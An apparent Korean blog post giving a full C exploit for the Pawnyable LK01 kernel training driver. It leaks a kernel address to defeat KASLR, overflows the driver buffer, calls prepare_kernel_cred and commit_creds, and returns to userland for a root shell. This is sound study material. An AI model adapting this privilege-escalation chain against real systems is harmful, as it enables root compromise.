kernel exploit payload - kaslr

2025. 5. 30. 12:05·Kernel Exploit/Exercise

서론

[ Holstein v1 (LK01) - Pawnyable ] 기준으로 작성하였다.

주소 랜덤화 시 read를 통한 필요 주소 leak 후 offset을 계산하여 이를 적용한다.

즉, 우선 kaslr을 적용하지 않고 leak, offset을 계산하고 이를 반영하면 된다.

 

Payload

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int kbuf_size = 0x400;   /* presumed size in bytes of the driver's buffer; 0x400/8 = 128 qwords sizes every read/write below */
int global_fd;           /* descriptor for /dev/holstein, filled in by open_dev() */

void open_dev()
{
	/* Open the exercise's device node read/write into global_fd; the process
	 * terminates with -1 when the open fails. */
	global_fd = open("/dev/holstein", O_RDWR);
	if (global_fd >= 0) {
		puts("[*] Opened device");
		return;
	}
	puts("[!] Failed to open device");
	exit(-1);
}

unsigned long user_cs, user_ss, user_rflags, user_sp;   /* userland cs/ss/rflags/rsp captured by save_state(), consumed by restore_state() */

void save_state(void)
{
	/* Snapshot the current cs, ss, rsp and rflags into the user_* globals.
	 * restore_state() pushes exactly these four values (plus user_rip) for its iretq,
	 * so this must run before the device is touched. */
	__asm__ __volatile__(
    "mov %cs, user_cs;"
    "mov %ss, user_ss;"
    "mov %rsp, user_sp;"
    "pushf;"                 /* rflags is not directly movable: go through the stack */
    "pop user_rflags;"
    );
    puts("[*] Saved state");
}
    
void print_leak(unsigned long *leak, unsigned n)
{
	/* Dump the first n qwords of a buffer, one "index: hex" line each.
	 * The caller guarantees leak holds at least n elements. */
	unsigned idx = 0;
	while (idx < n) {
		printf("%u: %lx\n", idx, leak[idx]);
		idx++;
	}
}

unsigned long leak;   /* kernel address read back by leak_addr(); escalate_privs() rebases its targets from it */

void leak_addr(void)
{
	/* Read more than kbuf_size bytes from the device and keep the qword at index
	 * kbuf_size/8+1 as the leaked address. The array is zeroed first, so a short or
	 * failed read leaves leak == 0 rather than stack garbage. */
	unsigned long arry[kbuf_size/8 + 100];   /* VLA: 128 + 100 qwords for the default kbuf_size */
    memset(arry,0,sizeof(arry));
    read(global_fd, arry, sizeof(arry));     /* NOTE(review): return value is unchecked; a short read is not detected */
    leak = arry[kbuf_size/8+1];
    //print_leak(leak, 200);                 /* NOTE(review): as written this would pass a scalar where a pointer is expected; use arry */
    printf("[*] Leak: %lx\n", leak);
}

void get_shell(void)
{
	puts("[*] Returned to userland");
    if (getuid() == 0)
    {
    	printf("[*] UID: %d, got root!\n", getuid());
        char *argv[] = { "/bin/sh", NULL };
        char *envp[] = { NULL };
        execve("/bin/sh", argv, envp);
    }
    else
    {
    	printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
}

unsigned long user_rip = (unsigned long)get_shell;   /* return address pushed by restore_state() for iretq */

void restore_state(void)
{
	/* Build an iretq frame from the values saved by save_state() (ss, rsp, rflags, cs)
	 * plus user_rip, and return to userland at get_shell(). The pushes must stay in
	 * exactly this order: it is the layout iretq expects. Does not return. */
	__asm__ __volatile__(
    "swapgs;"                  /* restore the userland gs base before leaving the kernel */
    "movq user_ss, %r15;"
    "push %r15;"
    "movq user_sp, %r15;"
    "push %r15;"
    "movq user_rflags, %r15;"
    "push %r15;"
    "movq user_cs, %r15;"
    "push %r15;"
    "movq user_rip, %r15;"
    "push %r15;"
    "iretq;"
    );
}

unsigned long prepare_kernel_cred;   /* rebased from `leak` in escalate_privs(); offset is specific to the exercise's kernel build */
unsigned long commit_cred;           /* same: rebased from `leak` in escalate_privs() */
unsigned long restore_state_addr = (unsigned long)restore_state;   /* read by the inline asm in escalate_privs() */

void escalate_privs(void)
{
	/* Intended to run once the overflowed return address is reached. The two
	 * targets are rebased from `leak` with fixed offsets valid only for the
	 * exercise's kernel image (as the introduction says, recompute them without
	 * KASLR first). Control then passes to restore_state(), which never returns. */
	prepare_kernel_cred = leak - 0xcf0fc;
    commit_cred = leak - 0xcefac;
    
	__asm__ __volatile__(
    "movq prepare_kernel_cred, %rax;"
    "xor %rdi, %rdi;"                /* first call is made with a NULL argument */
    "call *%rax;"
    "movq %rax, %rdi;"               /* its return value is the argument of the second call */
    "movq commit_cred, %rax;"
    "call *%rax;"
    "movq restore_state_addr, %rax;"
    "call *%rax;"                    /* ends in iretq; nothing after this executes */
    );
}

void exploit()
{
	/* Build kbuf_size/8+2 qwords (130 by default): 128 filler values, one padding
	 * qword, then the address of escalate_privs, and write them to the device. */
	unsigned long payload[kbuf_size/8+2];
    int offset;                              /* NOTE(review): used as an index below without being initialised — undefined behaviour; it should start at 0 */
    for(int i =0; i < 128; i++)              /* 128 == kbuf_size/8 for the default kbuf_size; the two are not tied together */
    {
    	payload[offset++] = 0xdeadbeefdeadbeef;
    }
    payload[offset++] = 0xaaaaaaaaaaaaaaaa;
    payload[offset++] = (unsigned long)escalate_privs;
    
    unsigned long escal_addr = (unsigned long)escalate_privs;
    
    printf("[*] Prepared payload : escallte_privs addr = %lx\n",escal_addr);
    write(global_fd, payload, sizeof(payload));   /* NOTE(review): return value unchecked */
    
    puts("[!] Error while exploit");             /* only reached if write() returned normally */
}

int main()
{
	/* save_state() runs first so the user_* globals hold this function's context;
	 * then open the device, take the leak and send the overflow. The last puts()
	 * is reached only if exploit() returned, i.e. the overflow did not take effect. */
	save_state();
    open_dev();
    leak_addr();
    exploit();
    puts("[!] Error after exploit");
    
    return 0;
}

 
